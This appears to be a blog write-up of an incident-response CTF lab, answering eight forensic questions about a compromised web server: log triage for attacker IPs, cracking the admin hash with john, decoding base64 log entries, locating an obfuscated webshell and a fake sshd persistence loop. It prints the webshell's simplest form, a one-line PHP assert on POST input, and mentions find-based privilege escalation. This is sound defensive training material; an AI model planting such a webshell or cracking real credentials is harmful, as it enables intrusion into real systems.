!!!需要環境可私信博主!!!
!!!若有錯誤歡迎指正!:)
| 序號 | 任務要求 |
| 1 | 提交攻擊者的兩個內網IP地址 |
| 2 | 提交網站管理員用戶的用戶名和密碼 |
| 3 | 提交黑客得到 mysql 服務的 root 賬號密碼的時間 |
| 4 | 查找黑客在WEB應用中寫入的惡意代碼,提交文件絕對路徑 |
| 5 | 查找黑客在WEB應用中寫入的惡意代碼,提交最簡單的形式 (格式:<?php xxxx?>) |
| 6 | 分析攻擊者的提權手法,提交攻擊者通過哪一個指令成功提權 |
| 7 | 服務器內與動態惡意程序相關的三個文件絕對路徑 |
| 8 | 惡意程序對外連接的目的IP地址 |
目錄
1、提交攻擊者的兩個內網IP地址
2、提交網站管理員用戶的用戶名和密碼
3、提交黑客得到mysql服務的root賬號密碼的時間
4、查找黑客在WEB應用中寫入的惡意代碼,提交文件絕對路徑
5、查找黑客在WEB應用中寫入的惡意代碼,提交最簡單的形式(格式: )
6、分析攻擊者的提權手法,提交攻擊者通過哪一個指令成功提權
7、服務器內與動態惡意程序相關的三個文件絕對路徑
8、惡意程序對外連接的目的IP地址
1、提交攻擊者的兩個內網IP地址
篩選出日志中出現的IP地址并進行排序
cat access_log* | awk '{print $1}' | sort | uniq -c | sort -nr
這里我查看了幾個IP的流量最終發現 192.168.21.1 和192.168.21.137 存在攻擊行為
flag{192.168.21.1,192.168.21.137}
2、提交網站管理員用戶的用戶名和密碼
在本地網站文件中,全局搜素查看存放數據庫賬號密碼的文件
grep -rE "username|password|databases" ../
發現一個 settings.php 文件內容似乎與數據庫相關,查看內容找到了數據庫的賬號和密碼
使用賬號密碼登錄到本地數據庫中,注意這里需要加上 127.0.0.1 才可以連接到數據庫中
查庫查表最后菜 users 表中發現 admin 的賬戶和加密的密碼
將密碼 copy 出來,使用 john 工具進行破解,最后得到密碼為 1111
flag{admin:1111}
3、提交黑客得到mysql服務的root賬號密碼的時間
繼續審計日志文件,可以發現攻擊者有幾條日志的內容進行了base64加密
解碼base64內容,發現黑客正在讀取服務器數據庫的賬號密碼信息,所以確定時間為:30/Jun/2020:04:09:12
flag{30/Jun/2020:04:09:12}
4、查找黑客在WEB應用中寫入的惡意代碼,提交文件絕對路徑
查看日志的時候發現這樣的一大段可疑流量
丟入Cyber進行解碼后發現是使用取反 ~ 運算的變形webshell,所以確定該文件是黑客寫入的惡意代碼
詳細可了解:不包含數字字母的WebShell - FreeBuf網絡安全行業門戶
查找一下文件存儲的位置
flag{/var/www/html/cron.php}
5、查找黑客在WEB應用中寫入的惡意代碼,提交最簡單的形式(格式:<?php xxxx?>)
最終的格式為 assert($_POST[_]);
flag{<?php assert($_POST[_]); ?>}
6、分析攻擊者的提權手法,提交攻擊者通過哪一個指令成功提權
分析這條日志內容可以發現攻擊者利用的是 find 提權
7、服務器內與動態惡意程序相關的三個文件絕對路徑
使用 pstree 查看系統運行的程序
發現 sshd 進程下直接生成了一個 sleep 命令不同尋常,查看 sshd 文件
其中有一個永真的循環腳本,來消耗網絡資源,再有 ssh 來調用
所以這里與動態惡意程序相關的三個文件絕對路徑為:/etc/ssh/sshd,/bin/sshd,/usr/lib/systemd/system/ssh.service
flag{/etc/ssh/sshd,/bin/sshd,/usr/lib/systemd/system/ssh.service}
8、惡意程序對外連接的目的IP地址
使用 netstat 命令查看網絡端口狀態
flag{47.113.101.105}
)
